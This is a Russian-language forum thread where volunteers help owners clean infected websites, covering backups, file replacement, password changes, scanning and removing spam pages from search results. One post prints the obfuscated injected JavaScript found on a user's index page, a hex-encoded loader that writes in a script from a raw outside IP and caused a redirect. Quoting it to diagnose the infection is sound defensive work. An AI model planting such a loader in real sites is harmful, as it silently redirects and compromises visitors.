Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 

Lunik

Активный пользователь
Сообщения
571
Реакции
137
Баллы
103
К сожалению САППОРТ не может мне предоставить доступ к админ панели, мотивируя тем, что он заражен вирусом.
Я Вам больше скажу, он в принципе не должен был этого делать. Судя по картинкам, у Вас етсь доступ до Панели управления хостингом и доя Управлением БД. В интернете есть инструкции как восстановить доступ к WP через БД,
 

raveal-2

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
Через панель своего хостинга wp-content/plugins/ я отключил все плагины (_29 шт) сайта хттп://dohodnoemecto.r путем их переименования.
Сайт по-прежнему не открывается и показывает тот код, который я показывал в своем сообщении от
26 Июн 2018
Список применяемых плагинов на сайте прилагаю
 
Последнее редактирование модератором:

Lunik

Активный пользователь
Сообщения
571
Реакции
137
Баллы
103
Для начало можно сделать резервную копию сайта, полный бэкап всех файлов и БД сохранить. Дальше восстановить резервную копию если такова имеется на момент работоспособности сайта.
После чего сменить пароли от хостинга и фтп возможно БД.

Когда копию восстановить сайт запустить, зайти в панель управления сайтом отключить или удалить плагины. Провести аудит безопасности сайта.

Так же рекомендую все таки нанять специалиста.
 

regist

гоняюсь за туманом
Ассоциация VN/VIP
VIP
Разработчик
Сообщения
12,335
Реакции
5,960
Баллы
998
@raveal-2, вам там прямым тектом пишет, что ошибка из-за файла admin-header.php
Post automatically merged:

и список плагинов лучше удалите из своего поста.
 
  • Like
Реакции: akok

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл admin-header.php, на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
 

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
удалил
 

raveal-2

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
Нус приступим.

1. Делайте бекап файлов и базы данных, дабы все не поломать окончательно.
2. Подготовьте архив чистых файлов WP Русский
3. Замените файл на чистый из архива (старый файл не удаляйте, а просто переименуйте). Если после замены сайт запустится, то все отлично
4. Качаете скрипт AI-Bolit - антивирус для сайта, сканер вирусов на хостинге и сайте и проверяете содержимое.
5. Смените пароли доступа к сайту и БД. Проверьте наличие левых пользователей.

Если это все сложно, лучше закажите платное лечение (у тех же revisium), а то можете окончательно все поломать.
Привет АКОК!
Я сделал бэкап, подготовил чистый архив и вставил чистый файл admin-header.php , переименовал старый файл
dmin-header.php

Теперь, если позволите, пару вопросов дилетанта:
-Мне теперь, для того чтобы проверить работу сайта опять нужно закачать на хостинг этот бэкап с чистым файлом?
-Если "да", то как это сделать? Нужно ли предварительно использовать сканер Ai-Bolit?
-Как проверить наличие левых пользователей?
Спасибо
 

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
После подготовки резервной копии, нужно было менять файл на самом хостинге, а не в бекапе. Бекап на случай "все пропало". Если сайт запустится, то воспользуйтесь Ai-Bolit, если нет. То тут только переустановка. Не забывайте о бекапе.
 

raveal-2

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
Здравствуйте.
Avast информирует о зараженной индексной странице сайта х ттр://dohodtut.ru
На остальные страницы сайта Avast не реагирует.
Например - х ттр://dohodtut.ru/index.html или х ттр://dohodtut.ru/MLM_v_%202raza.html
Как данный вирус удалить? Спасибо за ответ
 

Вложения

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
1. Главная сейчас ничего не отдает, белая страница

2. С dohodtut.ru/index.htm был редирект на start.parimatch.com

В коде
HTML:
<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script>
Описание WordPress Hacks: jQuery JS script injection :: Cybersecurity blog :: www.polaris64.net
 

raveal-2

Новый пользователь
Сообщения
9
Реакции
0
Баллы
1
@akok, Редирект можно как-то удалить?
Теперь и х ттр:// dohodtut.ru/index.htm ничего не отдает, белая страница...
Как исправить? Поможет ли предоставление кода главной страницы?
 

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
Редирект можно как-то удалить?
отредактировать страницу и убрать вставку в моем предыдущем посте.

С белой страницей, смотрите в настройки хостинга/скрипта или наймите администратора на часок.
и/или закажите лечение на стороннем сервисе (например: Вылечить сайт от вирусов.)
 

Serge

Новый пользователь
Сообщения
2
Реакции
0
Баллы
1
Здравствуйте!
Помогите, пожалуйста, с сайтом хттп://belmetall.by
В search console индексируются тысячи страниц, сгенерированных явно вирусом.
site: выдает чего-то с японскими иероглифами... Восстановил бэкап, удалил ненужные расширения, но ситуация с индексацией не поменялась.
Что можно сделать, помогите!!!
 

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии

После заказать удаление каталогов (они выдают сейчас 404 ошибку)

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
 

Serge

Новый пользователь
Сообщения
2
Реакции
0
Баллы
1
  1. Сменить пароли доступа к сайту/хостингу (и проверьте список администраторов)
  2. Обновить скрипт до последней версии
После заказать удаление каталогов (они выдают сейчас 404 ошибку)

С ссылками index.php?category сложнее, для удаления нужно сделать редирект на главную (сейчас просто отдается главная страница, а нужен 301 редирект), ну или 404 если не используете категории.

А можно ничего не делать и поисковики сами выбросят страницы из поиска за пару месяцев.
Спасибо большое за ответ!
Конечно же, 1,2 были сделаны.
Меня беспокоит то, что всё это проделано уже 2 недели назад, а страницы эти по прежнему в индексе, меньше не становиться.
Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Удалять страницы гугловским инструментом наверное не реально, их же тысячи, как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Не могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?
Спасибо заранее!
 

akok

Команда форума
Администратор
Сообщения
17,694
Реакции
13,483
Баллы
2,203
уже 2 недели назад
Удаление будет только тогда когда бот их заново проиндексирует, а это занимает месяца.

Можно ли как-то убедиться в том, что на сайте в данный момент нет вредоносного кода?
Сейчас признаков взлома нет, отслеживайте метрики в консоли, если количество спам-страниц будет расти, то значит не все обновили.



е могли бы вы подробнее расписать как сделать редирект, честно говоря совсем новичок(категории не использую)?

Если конечно используете Apache
как сделать это массово(по шаблону например, или загрузить) я не нахожу.
Раньше можно было удалять каталоги, но смотрю форму поменяли.

О Yandex вебматере не забывайте.
 
Сверху Снизу